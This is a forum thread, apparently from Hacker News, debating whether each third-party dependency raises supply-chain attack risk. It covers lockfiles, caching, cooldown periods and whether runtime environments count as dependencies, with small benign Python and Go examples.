Every dependency you add is a supply chain attack waiting to happen
98 points by benhoyt
Correction: Every dependency you add is many supply chain attacks waiting to happen.
Very true! Both because of new ones potentially cropping up over time, and because they may each have indirect dependencies.
While you're here, I really appreciate your article Our Software Dependency Problem. I've shared it many times at work. Thanks!
"Potential" is not the same as "waiting to happen". We don't have infinite time, and certainly not infinite monkeys with typewriters. All risk has to be weighed by the likelihood of its triggering circumstances to happen; if you run a trojan in an airgapped environment, is it really a liability ?
No matter who I talk to, this is always an unpopular stance. It's rather unfortunate that it is, too.
The problem is made worse by the practice of "don't cache, but instead download all dependencies on every build".
This means that any dependency attack is immediately spread to tens, if not hundreds of thousands of machines.
I don’t follow. Not caching might be laziness, or using inflexible build tools, but ultimately very few supply chain attacks are the result of an existing package release being replaced by a compromised version.
Instead it’s generally the maintainer accesses being stolen and a new, compromised, version being released.
Perhaps I’m wrong in assuming every stack uses lockfiles, but merely failing to cache or vendor your dependencies shouldn’t result in being pwned.
Also, many lockfiles now contain a digest of the originally downloaded package, which ensures that further downloads use the exact same artifact, byte for byte.
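The digest check itself is trivial; here's a minimal sketch (illustrative only, not any particular package manager's implementation — the artifact bytes and lockfile entry are made up):

```python
import hashlib

def verify_artifact(data: bytes, expected_sha256: str) -> bool:
    """Check a downloaded package against the digest recorded in the lockfile."""
    return hashlib.sha256(data).hexdigest() == expected_sha256

# Hypothetical lockfile entry: the digest recorded when the dependency
# was first evaluated and added.
artifact = b"fake package contents"
locked_digest = hashlib.sha256(artifact).hexdigest()

# A byte-identical re-download passes; a replaced/tampered artifact fails.
print(verify_artifact(artifact, locked_digest))                 # True
print(verify_artifact(artifact + b"tampered", locked_digest))   # False
```

This is why replacing an already-released version on the registry doesn't pwn anyone using hash-pinned lockfiles — attackers have to publish a new version instead.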
It's a prisoner's dilemma. One organisation might advance their security posture by not being the first mover and waiting for everybody else to hit the vulnerabilities first. But if everybody waits a month before updating something, we're back to square one because nobody is testing early - except now legitimate patches take longer to propagate, which is a strictly worse situation for all.
Actually, people are testing early: security researchers. They are highly incentivized to find and stop supply chain attacks to sell their products.
My issue was more that automated, unthinking updates are likely bad. They show a fundamental failure of process.
"What version of foo.js do we need? I dunno, let's just download the newest one every 10 minutes!"
That approach goes against decades of engineering practice.
Caching doesn't help. Caching is a technicality to store locally what is believed to be the very same blob that exists remotely. It only kicks in once you've already pulled the dependency.
What would mitigate the issue would be pinning dependencies to known specific stable builds that are known to work and be safe. I think you probably mean this.
Pinning is useful, too. I'm not recommending "one true magic solution" to solve all problems.
From a simple engineering point of view, it's insane to have dozens of employees download the same package dozens of times a day. Caching should be the bare minimum for engineering competence.
Caching also allows you to lower the time frame where you might be vulnerable. If you're downloading a package once a day, you're less vulnerable than if you're downloading it every minute.
Caching also makes it easier to centralize pinning, along with any scanning of downloads.
This is the actual problem. A supply chain attack can only affect you if you're updating to latest constantly.
Software engineering, like life, is a balance of risk. You can minimize risk as much as possible at the expense of comfort and other things. What is the arbitrary line between too many dependencies and "let's build our X from scratch when Y exists"?
Exactly right, and the real problem is that teams don't have these conversations, because having them in a reasonable way isn't part of their engineering culture.
When you evaluated the dependency initially (and added its hash to your lockfile), you probably did your due diligence.
I think this is a long stretch in this day and age...
I personally have come to like the idea of cooldown periods — gives automated scanners a few days to find attacks. But in general, I think standing on the shoulders of giants lets smaller teams ship more ambitious projects.
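The cooldown idea is simple to sketch: only ever select versions that have been public for at least N days, so automated scanners have time to flag a compromised release before you pull it. Some dependency-update bots expose this as a setting; the sketch below (with made-up versions and release dates) shows the underlying selection logic:

```python
from datetime import datetime, timedelta, timezone

# Hypothetical release metadata: version -> publication time. In practice
# this would come from the registry's API.
RELEASES = {
    "1.4.0": datetime(2024, 1, 2, tzinfo=timezone.utc),
    "1.4.1": datetime(2024, 3, 1, tzinfo=timezone.utc),
    "1.5.0": datetime(2024, 3, 14, tzinfo=timezone.utc),  # published yesterday
}

def newest_cooled_version(releases, now, cooldown_days=7):
    """Return the newest version published at least `cooldown_days` ago."""
    cutoff = now - timedelta(days=cooldown_days)
    eligible = [(ts, v) for v, ts in releases.items() if ts <= cutoff]
    if not eligible:
        return None
    return max(eligible)[1]  # newest publication time among eligible versions

now = datetime(2024, 3, 15, tzinfo=timezone.utc)
print(newest_cooled_version(RELEASES, now))  # 1.4.1 — 1.5.0 is only a day old
```

Note this is a mitigation, not a guarantee: it only helps if someone actually finds the attack during the cooldown window.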
While I know it wasn't the goal of the article, I'm going to use it to continue to justify my chronic case of NIH (Not Invented Here) syndrome.
I think it was the goal, no? And it's no bad thing. Diversity in a population breeds immunity and resilience. The world will be in a better and more predictable place if a consistent 1% of systems become vulnerable every month rather than there being a 1% chance of every system becoming vulnerable at the same time every month.
I don't think that was the goal at all in my reading of the article. The last line of the article makes it pretty clear “a little copying is better than a little dependency”. I took this to mean that instead of using a dependency, you can just have a copy, whether it is a whole library or just a specific function, and thus you won't be nearly as vulnerable to these sorts of attacks. My take was more like "Don't copy, write yourself ya lazy bum!" :)
Seems like a bad thing. Building your own for fun or learning is good. But multiple different bits of code which all achieve the same goal is inefficient. Maximum code reuse is the way
That seems like an unnecessarily binary way of thinking to me. Surely there's a happy medium?
Why? What practical benefit (again, excluding for fun and learning) would there be in building again something which has already been built and can be trivially copied or used?
This is perhaps directed by what my parents taught me during my upbringing, but there are parts where it's really nice to be independent in life. The most fundamental things most often, that you really, deeply care about—your house, for example—such that nothing but the strongest of forces can pull your life away from under your feet.
Likewise in code, there are certain fundamental aspects that I like to keep independent, so that nothing can pull the rug on me. In a video game, which is the thing I've spent most of my professional years making, that would be the game engine—I've heard multiple friends doing game dev as a hobby complain that breaking updates in Unity are a pain. I've also spent a few years working professionally with Unreal Engine, in a company cooperating closely with its developers, and my personal opinion is that it's an old tool which you can't always rely on—as well as, relying on Epic Games' developers to fix things feels exactly as good as having a landlord renting you a flat with a washing machine, and they're only ever willing to spend money on a basic, minimum washing machine that is loud and slow.
Depending on others necessarily means things may not go as you want them to, because those other people may have differing opinions on what's good, or differing time and money budgets that make them focus on things you are not exactly always interested in—while long standing problems remain unaddressed.
So, in my opinion, it's good to be independent with those fundamental things you spend the most time working with.
I understand though this is a philosophy among many, directed by my own life experiences, and it might not make sense to you if you haven't experienced something similar.
My first thought every time I see something like this is to ask: what counts as a dependency?
Even for Go, whose philosophy the author approvingly quotes, there's no such thing as a truly zero-dependency application. A "standalone" Go binary still needs a reasonably robust operating system to be able to run, and still needs at least the Go toolchain to build. Are those being counted among the dependencies? Even for an absolutely minimal Linux environment you're still pulling in huge amounts of third-party code that you haven't read, never will read, and which you don't fully control the update process for (if you pull a base Docker image, for example, you're getting whatever the distro decided to put in that particular tag, not what you chose). And all it takes is one briefly-undetected compromise of any one of the many, many sub-components of that distro to get you back in trouble (see: xz).
So as I see it, you have "dependencies" and the associated risks no matter what. No man is an island, says the poet, and neither is any of our code. Which means you can't ever let your guard down and pat yourself on the back for not having "dependencies"; you have to adopt the processes and safeguards to protect and mitigate against dependency compromise no matter what you're doing. At which point, you might as well take fuller advantage of other people's code and save yourself the time and trouble of trying to avoid or reproduce it.
Even for Go, whose philosophy the author approvingly quotes, there's no such thing as a truly zero-dependency application.
If you find yourself thinking "these people are discussing X, but if X is re-defined as Y then there's no such thing as X, therefore they don't understand the problem" then your thought process has gone off-track.
Discussions about dependencies in userspace programming are about third-party library dependencies, so they exclude functionality provided by the environment (kernel, libraries provided by the OS) and the language (standard library, possibly even extended stdlib such as golang.org/x/).
A zero-dependency codebase is therefore one that only uses OS and stdlib functionality, and doesn't require any third-party library code.
A "standalone" Go binary still needs a reasonably robust operating system to be able to run, and still needs at least the Go toolchain to build. Are those being counted among the dependencies?
No, because they're not third-party library dependencies. The stdlib, OS libc, OS kernel, CPU microcode, and the firmware in your home's circuit breaker are not part of the dependency stack from the point of view of a userspace developer.
Even for an absolutely minimal Linux environment you're still pulling in huge amounts of third-party code that you haven't read, never will read, and which you don't fully control the update process for
A minimal Linux environment is the kernel, which is not usually distributed with userspace application code. And if there was a security vulnerability in the Linux kernel then nobody would blame the applications running on it.
(if you pull a base Docker image, for example, you're getting whatever the distro decided to put in that particular tag, not what you chose).
People who care about minimizing dependencies aren't usually building with a distribution-based Docker base image. Either they use FROM scratch for an empty base and provide a statically-linked binary (common for Go and Rust), or they have a specific version of libc (etc) that they have qualified as part of their development process.
A zero-dependency codebase is therefore one that only uses OS and stdlib functionality, and doesn't require any third-party library code.
And yet it still relies on huge quantities of third-party code which can contain security vulnerabilities, or be compromised by attackers, and you still need to have processes in place to deal with those issues. There is no situation where trying to redefine "dependency" to exclude some of your dependencies gets you out of that.
And yet it still relies on huge quantities of third-party code which can contain security vulnerabilities, or be compromised by attackers, and you still need to have processes in place to deal with those issues.
What position are you arguing against? It's obviously not from the OP's link, or anywhere in this thread.
If you want to claim that Go binary compiled against only the Go standard library contains huge quantities of object code that did not originate from its own source code or the Go stdlib, then to be blunt I don't believe you. Prove it.
If you want to claim that a binary's entire runtime environment, including OS, should be counted as part of that binary's dependency graph for security response purposes then (1) you won't be able to convince anyone that's a reasonable position, and (2) nobody who ships userland applications is going to take responsibility for auditing their OS kernel.
If you think people are claiming that eliminating dependencies means they don't need a defined procedure for security-critical bugs then you are misunderstanding them, because to do so would be to claim that first-party code is proven correct by mere construction.
There is no situation where trying to redefine "dependency" to exclude some of your dependencies gets you out of that.
Again, you're using a non-standard definition of "dependency" which is why you're confused about what other people are or are not claiming regarding the benefits of reducing dependencies.
The goal of reducing or eliminating dependencies (which, remember, are definitionally third-party code) is mitigation, and it's a highly effective one.
If you want to claim that Go binary compiled against only the Go standard library contains huge quantities of object code that did not originate from its own source code or the Go stdlib, then to be blunt I don't believe you. Prove it.
Where did GP claim this?
I think you are stuck on semantics, and are more concerned about classifying code executing in the context of an application as either "dependency" or "non-dependency". The GP seems more concerned with improving the security posture of the whole application, and their argument seems to be that the heuristic of "minimizing dependencies" is potentially dangerous.
I don't know whether I agree with GP, but I don't think you've even engaged with it fully yet.
Where did GP claim this?
In the post I replied to, in the part I quoted.
I think you are stuck on semantics, and are more concerned about classifying code executing in the context of an application as either "dependency" or "non-dependency".
No, I'm annoyed that yet again someone is using the "I see you talking about blueberry muffins, if I redefine 'blueberry' to mean a berry that is uniformly #0000FF then blueberries don't really exist, therefore you have never seen a blueberry muffin" pattern to shoehorn their own personal windmill-chasing into an unrelated discussion.
The GP seems more concerned with improving the security posture of the whole application, and their argument seems to be that the heuristic of "minimizing dependencies" is potentially dangerous.
The GP wants to change the definition of "dependency" to encompass all the code that needs to execute correctly to enable an application to execute as designed.
In that definition a Go binary compiled for macOS that prints "hello world" can't be said to be zero-dependency; it depends on libSystem.dylib, the kernel, the GPU firmware, the CPU microcode, and everything else in the stack of abstractions that is a modern computer.
He argues that if this is the definition of a "dependency" then no userspace software can be said to be truly "zero-dependency". Then he extends that argument to say that with the millions and millions of unaudited LoC required just to print "hello world" it's unreasonable to ascribe security issues to the use of third-party library code.
The argument against this is, basically, that when people say "dependency" they don't mean the OS or kernel or firmware. They mean third-party library code. That's the entire scope of the discussion. It's an argument about left-pad and its allies.
The actual reason people put forward to minimize dependencies is that each one represents a distinct path by which unreviewed code can become incorporated into your program's build artifact. The value a dependency provides vs open-coding its equivalent needs to be balanced against the security risk and maintenance cost inherent in depending on it.
I don't know whether I agree with GP, but I don't think you've even engaged with it fully yet.
Whatever he's arguing doesn't need to be thought about because it has nothing to do with the actual topic at hand.
Whatever he's arguing doesn't need to be thought about because it has nothing to do with the actual topic at hand.
I think this is where the disagreement really begins and ends, so I won't reply to each point.
I will, however, selfishly indulge in a final hypothetical to try to convey why I think you are wrong to narrow the focus of discussion this way:
If a homeowner were to post to their homeowner blog saying:
In my essay “The old home is beautiful”, I discussed how using fewer appliances makes your home more nostalgic. But it also makes it safer.
As we’ve seen recently, appliances can and do start fires. We saw this on a grand scale with the faulty Mr. Heater units during the last blizzard, and we’ve seen it more recently with the Ninja Creami incident and with power strips being compromised (which was actually caused by the Ninja Creami).
The interesting thing about the Ninja Creami is that it’s not even an essential appliance; it’s a gimmick appliance. But a fault in a gimmick appliance can still burn your house down.
The careful reader may note that my title is not quite accurate. It’s not every appliance you install that’s a problem; it’s every dependency you run. When you bought the appliance initially, you probably did your due diligence. But appliances can break down over time, and you probably don't check them for safety as often as you need to.
You should probably throw out your appliances. In my experience, we get more problems from them than we get benefit.
So, please think twice, or thrice, before adding a new appliance to your home. As the luddite proverb says, “a little discomfort and extra effort is better than a little appliance”.
Then, someone comments to the effect of:
My first thought every time I see something like this is to ask: what counts as a fire-risk worth eliminating?
Even for luddites, whose philosophy the author approvingly quotes, there's no such thing as a truly fire-risk free home. A "fire-risk free" home still needs to be heated, and still exists in a world full of flammable trees, neighboring homes, and arsonists. Are those being counted among the fire risks? ...
So as I see it, you have fire-risk no matter what. No man is an island, says the poet, and neither are any of our homes. Which means you can't ever let your guard down and pat yourself on the back for not having appliances; you have to adopt the processes and safeguards to protect and mitigate against fire no matter what you're doing. At which point, you might as well take fuller advantage of useful appliances and save yourself the time and trouble of trying to avoid them.
And you then object, because the discussion was about appliances, and this comment is off-topic and tries to redefine a term. (It never actually redefines anything; it talks about "dependencies" in quotes, as the original comment did, to argue that the very definition you want to cling to is not terribly useful in this context. But I digress.) In my reproduction I use different terms ("appliances" and "fire-risk") for the related-but-distinct concepts you object to rhetorically conflating, which hopefully helps?
If your position is just "this is about a heuristic for a subset of the third-party code that poses a security risk, and I don't care about broadening the discussion" that's perfectly fine, but no need to pretend the commenter's "thought process has gone off-track."
If I were a refrigerator designer talking on a forum for the appliance manufacturing industry, on a thread about the tradeoffs between purchasing components off-the-shelf vs designing them in-house, I would absolutely be annoyed at someone coming in to say:
Like, I don't even care whether any of those are true or not -- before getting to the question of truth, the matter of topicality applies.
If your position is just "this is about a heuristic for a subset of the third-party code that poses a security risk, and I don't care about broadening the discussion" that's perfectly fine, but no need to pretend the commenter's "thought process has gone off-track."
I'm not "pretending" to think that, I actually do think that.
The original comment is not off-topic at all. You directly moved the conversation off-topic, by taking an on-topic comment and arguing semantics rather than engaging substantively. The very first sentence in your first reply is ad hominem, and misses the commenter's point entirely.
but also the customer's house wiring and whether they can pay their electric bill and whether they might be in a high-winds area prone to power outages
I don't get the electric bill or outage parts, since we care about safety/security, not whether something works at all.
To the wiring bit, I think appliance designers definitely do (or should) consider many things outside of the physical materials and components in the appliance itself, especially when safety is the goal. I googled a random user manual for a space heater and see:
You can say this is all liability boilerplate, and that the manufacturer really doesn't care, but I'm still certain they want to avoid the lawsuit to begin with. They are designing around environmental factors outside of their immediate control wherever they reasonably can.
Modern appliances have many features which directly interact with the environment, and often guard against faulty wiring/faults in things outside of the appliance itself. Things like surge protection, fuses, polarized plugs, bonded exposed metal and grounding through the plug, etc.
So no, I wouldn't expect anyone working on appliances to be annoyed if someone pointed this out in a discussion where someone is arguing anything approaching "do everything yourself whenever you can, that's how you make the thing safe."
"There are many possible causes of a house fire besides appliances, such as forest fires, so theres no point in reviewing the fire safety properties of individual components or taking special care to design critical components in-house"
The original comment says: "Which means you can't ever let your guard down and pat yourself on the back for not having "dependencies"; you have to adopt the processes and safeguards to protect and mitigate against dependency compromise no matter what you're doing."
In my reading, this advocates for the exact opposite of your mis-characterization of it.
"The only reason manufacturers would choose to do everything in house is because they don't want to offer a warranty program"
Is it really so crazy to read this into an article advocating for everyone to aggressively embrace NIH to improve security? The article does not pair the advice with anything about writing secure software, auditing software for security, etc. so the implication is that purely the act of avoiding dependencies is security-positive, which the original comment calls into question. Why is that annoying?
the implication is that purely the act of avoiding dependencies is security-positive, which the original comment calls into question. Why is that annoying?
Because that's not what the article claims.
Any code has a risk of containing bugs that introduce security vulnerabilities. Let code written in-house have risk H, third-party dependencies have risk R. Third-party dependencies come with an additional risk S of a future update containing newly-introduced vulnerabilities. Note that H and R scale with lines of code, but S is independent of LoC.
It's very common for developers to operate under the assumption that third-party code is better than they can write themselves and that it is safe to update dependencies automatically, i.e. H > R and S = 0. This leads to a development methodology that encourages using hundreds or thousands of small libraries for functionality that would have traditionally been written as part of the application itself.
This article is arguing that S > 0 and S > (R - H) * LoC for small LoC; in other words, it claims third-party code with automatic updates is not risk-free, and that for small amounts of code the risk of supply-chain compromise outweighs any possible benefit from using third-party code.
A claim that "avoiding dependencies is security-positive" is R > H which would be much more extreme, and would lead to something like stage0 which tries to bootstrap a trusted environment from manually-verified machine code, or uxn which is a small VM that can run bare-metal on home-built hardware.
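The model above is easy to play with numerically. With made-up per-line risks h and r and a fixed per-dependency supply-chain term s, the fixed term dominates for tiny dependencies and washes out for large ones (every number here is an illustrative assumption, not a measurement):

```python
def inhouse_risk(loc: int, h: float) -> float:
    """Expected vulnerability risk of writing `loc` lines yourself."""
    return h * loc

def dependency_risk(loc: int, r: float, s: float) -> float:
    """Risk of a dependency providing the same `loc` lines: per-line code
    risk plus a fixed supply-chain term `s` that does not scale with size."""
    return r * loc + s

# Illustrative values: r < h models "library authors write better code than
# you would"; s models the compromise risk of auto-updating a dependency.
h, r, s = 1e-4, 5e-5, 0.05

# For a left-pad-sized dependency the fixed supply-chain term dominates:
print(dependency_risk(20, r, s) > inhouse_risk(20, h))            # True
# For a large library the per-line advantage can win out:
print(dependency_risk(100_000, r, s) < inhouse_risk(100_000, h))  # True
```

Which is exactly the article's claim: the cost/benefit flips depending on how much code the dependency replaces, so small gimmick dependencies are the worst trade.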
Because that's not what the article claims.
Ah, so you can read in good-faith and fill in the blanks when something isn't explicit! You just refuse to do it when something annoys you.
I agree, I over-simplified the article. Thank you for explaining. I think you did a great job expanding the article into a framework to discuss the merits of the heuristic.
Now please respond to some of the other points I just made, or I'm not interested in continuing. I responded originally because you were being rude and ostensibly responding in bad faith, and I really only want to talk about that.
Here, respond to just one other thing I said:
The original comment is not off-topic at all. You directly moved the conversation off-topic, by taking an on-topic comment and arguing semantics rather than engaging substantively. The very first sentence in your first reply is ad hominem, and misses the commenter's point entirely.
Every one of my replies here has been made in full good faith.
and fill in the blanks when something isn't explicit! [...] I agree, I over-simplified the article. Thank you for explaining. I think you did a great job expanding the article into a framework to discuss the merits of the heuristic.
I did not fill in any blanks in the article or try to expand on it. What I wrote was literally just the content of the article, condensed into a few sentences.
You want me to respond point by point? Ok.
The original comment is not off-topic at all. You directly moved the conversation off-topic, by taking an on-topic comment and arguing semantics rather than engaging substantively.
The original comment was off-topic because the topic is third-party dependencies, and the comment was about the program's runtime environment, which is not part of a program's dependency set.
The very first sentence in your first reply is ad hominem, and misses the commenter's point entirely.
I did not miss the commenter's point, I understand it and know what aspect of modern programming he is referring to, which is that userspace programs place complex requirements on their runtime environment and therefore require the correct functioning of large amounts of third-party code to function as designed.
I don't think that topic (extensive runtime environment requirements) has anything to do with the topic of the article (large dependency sets).
but also the customer's house wiring and whether they can pay their electric bill and whether they might be in a high-winds area prone to power outages
I don't get the electric bill or outage parts, since we care about safety/security, not whether something works at all.
Whether a refrigerator functions depends on whether an electric supply is available, similar to how whether a userspace program functions depends on the correct behavior of its runtime environment (e.g. the kernel and system libraries).
To the wiring bit, I think appliance designers definitely do (or should) consider many things outside of the physical materials and components in the appliance itself, especially when safety is the goal. I googled a random user manual for a space heater and see:
[...]
You can say this is all liability boilerplate, and that the manufacturer really doesn't care, but I'm still certain they want to avoid the lawsuit to begin with. They are designing around environmental factors outside of their immediate control wherever they reasonably can.
All of those are regarding the appliance itself. There is no liability attached to a manufacturer for things outside of their control, such as forest fires.
In the analogy of software programs to appliances the electric supply is equivalent to the runtime environment the program is designed to operate in. For example a program compiled for Linux might expect a certain version of the Linux kernel ABI to be present and functional.
The exact details of how that runtime environment is supplied to the program are irrelevant to the program, just as the details of the electric grid are irrelevant to the refrigerator. A program compiled for the Linux kernel might (or might not) also run under FreeBSD (using the Linux ABI emulation), or gVisor (a userspace implementation of the Linux kernel ABI), or a customer-modified build of the Linux kernel that adds/removes/modifies some syscalls.
If someone runs a Linux program under a modified Linux kernel and those modifications cause that instance of the program to be insecure (e.g. because the modified kernel has non-standard mmap behavior) then that is not the responsibility of the program to guard against. It is unreasonable to expect programmers to write code under the assumption that they are responsible for the entire runtime environment to the same extent that they are responsible for the behavior of the program.
Modern appliances have many features which directly interact with the environment, and often guard against faulty wiring/faults in things outside of the appliance itself. Things like surge protection, fuses, polarized plugs, bonded exposed metal and grounding through the plug, etc.
Those are all functionalities of the appliance. A program might also contain functionality intended to guard against misuse and/or assert properties of the environment in which it is being run -- for example it might require secure-boot from a known-trusted root key to verify the OS and hardware belongs to an enumerated set of known-good configurations. Whether this checking exists or not does not imply that the entire runtime environment becomes part of the program's dependency set.
So no, I wouldn't expect anyone working on appliances to be annoyed if someone pointed this out in a discussion where someone is arguing anything approaching "do everything yourself whenever you can, that's how you make the thing safe."
For the runtime environment to be considered part of the program's dependency set is equivalent to an appliance manufacturer considering the customer's electric supply to be part of their refrigerator. No matter how much a manufacturer might take precautions to harden their appliance against unforeseen inputs (e.g. voltage spikes or brownouts), they are not responsible for the customer's electric supply physically being disconnected.
"There are many possible causes of a house fire besides appliances, such as forest fires, so theres no point in reviewing the fire safety properties of individual components or taking special care to design critical components in-house"
The original comment says: "Which means you can't ever let your guard down and pat yourself on the back for not having "dependencies"; you have to adopt the processes and safeguards to protect and mitigate against dependency compromise no matter what you're doing."
The original comment says "So as I see it, you have "dependencies" and the associated risks no matter what. [...] you might as well take fuller advantage of other people's code and save yourself the time and trouble of trying to avoid or reproduce it.".
This is a worldview in which a program is in a binary state of either depending on the correct behavior of any third-party code or not.
The set of programs that does not depend on any third-party code is too small and specialized to be relevant to the discussion (e.g. space probe firmware). The categories as defined by the top-level comment therefore collapse into a statement that all userspace programs depend on a complex runtime environment, and that the presence or absence of third-party code in the program's dependency set does not materially affect its security profile.
The part you quoted reflects the author's belief that people advocating for the reduction of third-party dependencies view a state of zero dependencies as equivalent to a state of zero security vulnerabilities. In other words, he believes that those "processes and safeguards" only exist because of the presence of third-party code in the program's dependency set.
However, the "processes and safeguards" he describes exist regardless of whether a program has dependencies or not, because first-party code authored by the developers of the program also has a non-zero risk of security vulnerabilities. To claim that a zero-dependency codebase does not require security-related "processes and safeguards" is to claim that first-party code definitionally cannot contain security vulnerabilities. This position is not common (indeed I have never heard of anyone advocating it), therefore the characterization of people advocating for reduction in dependency sets is attacking a straw man.
In my reading, this advocates for the exact opposite of your mis-characterization of it.
Per the discussion, your interpretation of his comment is different from mine.
"The only reason manufacturers would choose to do everything in house is because they don't want to offer a warranty program"
Is it really so crazy to read this into an article advocating for everyone to aggressively embrace NIH to improve security? The article does not pair the advice with anything about writing secure software, auditing software for security, etc. so the implication is that purely the act of avoiding dependencies is security-positive, which the original comment calls into question. Why is that annoying?
The original article identifies a specific source of security risk (supply-chain attacks) that is specific to third-party dependencies, notes that this security risk scales with the number of unique third-party dependencies, and recommends that the number of distinct third-party dependencies be viewed as a goal for reduction for the purposes of mitigating the identified security risk.
It advocates for viewing each third-party dependency as adding a non-zero amount of security risk to the program via the possibility of introduced novel vulnerabilities in future updates to those dependencies.
I don't see anything incorrect in any of those statements.
The article does not "aggressively embrace NIH" -- I don't see anything in it that says third-party dependencies must be avoided.
If you look at ecosystems that broadly follow the article's advice you will notice that they usually have dependencies that provide significant amounts of functionality (e.g. a media codec or GUI framework). In contrast, ecosystems that do not follow the article's advice (i.e. they encourage use of third-party dependencies in preference to self-written code) often prominently feature libraries that contain only a single piece of functionality that could be written by a typical programmer in a few minutes.
To take the examples of JavaScript and Go, a programmer working in JavaScript might use the object-assign package (99 million weekly downloads, version v4.1.1) to merge the properties of two JavaScript objects. A programmer working in Go would probably just write a function and include it in a per-project util.go somewhere.
Other JavaScript libraries that offer similar functionality include extend (56 million weekly downloads, v3.0.2) and object.assign (63 million weekly downloads, v4.1.7).
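The Go side of that comparison is small enough to sketch. A hypothetical `util.go` helper (illustrative only, not from any real project) might look like this:

```go
package main

import "fmt"

// mergeMaps copies the entries of each source map into dst,
// with later sources overwriting earlier ones -- roughly what
// object-assign does for JavaScript objects.
func mergeMaps(dst map[string]any, srcs ...map[string]any) map[string]any {
	if dst == nil {
		dst = make(map[string]any)
	}
	for _, src := range srcs {
		for k, v := range src {
			dst[k] = v
		}
	}
	return dst
}

func main() {
	merged := mergeMaps(
		map[string]any{"a": 1, "b": 2},
		map[string]any{"b": 3, "c": 4},
	)
	fmt.Println(merged["a"], merged["b"], merged["c"])
}
```

A dozen lines, no third-party code, and the whole behavior is visible at the call site.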
It is correct to note that the security risk introduced by depending on large numbers of small libraries maintained by individuals with unknown security postures (maybe they develop everything in Qubes, maybe they develop on the same machine they torrent pirated games on) is non-zero. The article's conclusion that adding new dependencies should be viewed as non-zero risk seems reasonable to me.
I did not fill in any blanks in the article or try to expand on it. What I wrote was literally just the content of the article, condensed into a few sentences.
You "condensed" a ~213 word article into ~214 words. I guess maybe you mean that all of the setup and context for the paragraph which starts "This article is arguing that..." doesn't count?
I disagree. You rewrote the article, with about the same number of words, and with many implicit aspects made explicit. That is not the same content.
The original comment was off-topic because the topic is third-party dependencies, and the comment was about the program's runtime environment, which is not part of a program's dependency set.
The original topic was security, of which third-party dependencies form a component.
I did not miss the commenter's point, I understand it and know what aspect of modern programming he is referring to, which is that userspace programs place complex requirements on their runtime environment and therefore require the correct functioning of large amounts of third-party code to function as designed.
I don't think that topic (extensive runtime environment requirements) has anything to do with the topic of the article (large dependency sets).
It seems like you still don't understand. The discussion is about security, and the original comment is on-topic.
Whether a refrigerator functions depends on whether an electric supply is available, similar to how whether a userspace program functions depends on the correct behavior of its runtime environment (e.g. the kernel and system libraries).
The topic is security, not whether the thing functions at all. That's why I am confused.
All of those are regarding the appliance itself. There is no liability attached to a manufacturer for things outside of their control, such as forest fires.
The topic is not about liability, blame, etc.
The topic is security, and only the security of the whole system actually matters.
However, as ubernostrum points out in another comment, there are situations like SaaS where those things very expressly are under your control.
If someone runs a Linux program under a modified Linux kernel and those modifications cause that instance of the program to be insecure (e.g. because the modified kernel has non-standard mmap behavior) then that is not the responsibility of the program to guard against. It is unreasonable to expect programmers to write code under the assumption that they are responsible for the entire runtime environment to the same extent that they are responsible for the behavior of the program.
In the SaaS context it is unreasonable to limit discussion of security to "library dependencies."
Those are all functionalities of the appliance. A program might also contain functionality intended to guard against misuse and/or assert properties of the environment in which it is being run -- for example it might require secure-boot from a known-trusted root key to verify the OS and hardware belongs to an enumerated set of known-good configurations. Whether this checking exists or not does not imply that the entire runtime environment becomes part of the program's dependency set.
There are still cases like SaaS where the focus on "dependency set" is not useful.
For the runtime environment to be considered part of the program's dependency set is equivalent to an appliance manufacturer considering the customer's electric supply to be part of their refrigerator. No matter how much a manufacturer might take precautions to harden their appliance against unforeseen inputs (e.g. voltage spikes or brownouts), they are not responsible for the customer's electric supply physically being disconnected.
If someone owns the power supply and built the fridge, then yes, it is their responsibility.
The original comment says "So as I see it, you have "dependencies" and the associated risks no matter what. [...] you might as well take fuller advantage of other people's code and save yourself the time and trouble of trying to avoid or reproduce it.". ... The part you quoted reflects the author's belief that people advocating for the reduction of third-party dependencies view a state of zero dependencies as equivalent to a state of zero security vulnerabilities. In other words, he believes that those "processes and safeguards" only exist because of the presence of third-party code in the program's dependency set.
No, it reflects that "you might as well take fuller advantage of other people's code" if that's true. It is in the bit you just quoted to me. This is the sort of thing I mean when I say you don't seem to post in "good faith": you read the best interpretation of the original article, and the worst interpretation of the comment you replied to. Try reading the best in both, and clarify things when you are not sure. Or at the very least don't start with a personal attack. You make it very hard to read the best into your reply when it starts like that.
The article does not "aggressively embrace NIH" -- I don't see anything in it that says third-party dependencies must be avoided.
I'm being hyperbolic again, my bad. I agree the article doesn't go this far.
To take the examples of JavaScript and Go, a programmer working in JavaScript might use the object-assign package (99 million weekly downloads, version v4.1.1) to merge the properties of two JavaScript objects. A programmer working in Go would probably just write a function and include it in a per-project util.go somewhere.
I actually think this is a great example of why libraries are so useful, and why ubernostrum's comment is not off-topic.
The object-assign package has three non-obvious checks to work around faulty runtime behavior. I'm sure one can contrive a scenario where one or all of these bugs could enable an exploit.
If the Go developer just made something that "works for me", they would be reimplementing these fixes themselves after the bug reports roll in. Multiply that by everyone who "just wrote a function" and there is a whole ecosystem of slightly incompatible, broken implementations.
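To make that failure mode concrete, here is a hypothetical "works for me" Go merge (illustrative only): it handles the happy path but panics when handed a nil destination map -- the same class of edge case that object-assign's extra checks exist to cover:

```go
package main

import "fmt"

// naiveMerge "works for me": fine when dst is a normal map,
// but writing to a nil map is a runtime panic in Go, so a
// caller passing a nil destination blows up in production.
func naiveMerge(dst, src map[string]int) map[string]int {
	for k, v := range src {
		dst[k] = v // panics when dst == nil
	}
	return dst
}

func main() {
	// The happy path works...
	fmt.Println(naiveMerge(map[string]int{"a": 1}, map[string]int{"b": 2}))

	// ...until a caller passes a nil destination.
	defer func() {
		if r := recover(); r != nil {
			fmt.Println("panicked:", r)
		}
	}()
	naiveMerge(nil, map[string]int{"b": 2})
}
```

Every project that "just wrote a function" fixes this bug separately, if it fixes it at all.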
We are just arguing Greenspun's tenth rule, and you're trying to shut down the discussion because "we weren't talking about common lisp."
The original article does not mention the many security benefits of using libraries in many cases (no matter how much you would like to read them into it, as if it was "literally" there). That's fine, it is about the length of a tweet, but what isn't fine is cutting off the discussion artificially based on what you personally like and dislike.
I think that if, say, I deploy a web application as a Docker container to a Kubernetes cluster, then the distro flavor of the container, along with Kubernetes and all its associated bits, become part of my application's dependencies and I have to account for the fact that they will need attention, sometimes urgently (as when a security issue is discovered).
Therefore I push back on people who seem to suggest that only things which come from a language package manager, and/or which are linked (statically or dynamically) by a compiled application binary, count as "dependencies".
The goal of reducing or eliminating dependencies (which, remember, are definitionally third-party code) is mitigation, and it's a highly effective one.
